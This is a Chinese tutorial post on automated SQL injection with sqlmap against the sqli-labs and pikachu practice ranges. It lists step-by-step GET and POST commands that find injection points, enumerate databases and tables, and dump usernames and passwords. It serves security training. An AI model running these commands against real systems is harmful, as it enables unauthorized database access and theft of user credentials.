作者:mobiledu2502916347 | 来源:互联网 | 2023-08-21 16:40
环境的准备:Python3.8,Windows操作系统,Sqlmap。 Sqlmap简介:Sqlmap是开源的自动化SQL注入工具,由Python写成。它支持的数据库有My
环境的准备:
Python 3.8,Windows操作系统,Sqlmap。
Sqlmap简介:
Sqlmap是开源的自动化SQL注入工具,由Python写成。它支持的数据库有MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。
GET注入的一般步骤:
python sqlmap.py -h #查看可使用指令
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" #判断注入点
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" --dbs #查看所有数据库名
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" -D security --tables #查看security数据库中的所有表名
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" -D security -T users --columns #查看security数据库中users表的所有字段名
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" -D security -T users -C id,password,username --dump #查看security数据库中users表的id,password,username的字段信息
POST注入的一般步骤:
使用burpsuite进行抓包,将数据包保存在txt文件中
python sqlmap.py -r C:\Users\Desktop\1234.txt
python sqlmap.py -r C:\Users\Desktop\1234.txt --dbs
python sqlmap.py -r C:\Users\Desktop\1234.txt -D pikachu --tables
python sqlmap.py -r C:\Users\Desktop\1234.txt -D pikachu -T users --columns
python sqlmap.py -r C:\Users\Desktop\1234.txt -D pikachu -T users -C id,password,username --dump
GET注入实战:
目标网站:sqli-labs靶场
1.查看sqlmap可使用的指令
2.在网站中输入参数,判断是否存在注入点
3.查看数据库信息
4.查看security数据库中的所有表名
5.查看security数据库中users表的所有字段名
6.查看security数据库中users表的id,password,username的字段信息,可以看到sqli-labs靶场数据库的所有账号密码信息
POST注入实战:
目标网站:pikachu靶场
1.在pikachu靶场填入表单信息,使用burpsuite进行抓包,将其保存到txt文件中
2.判断是否存在注入点
3.查看数据库信息
4.查看pikachu数据库中的所有表名
5.查看pikachu数据库中users表的所有字段名
6.查看pikachu数据库中users表的id,password,username的字段信息,可以看到pikachu靶场数据库的所有账号密码信息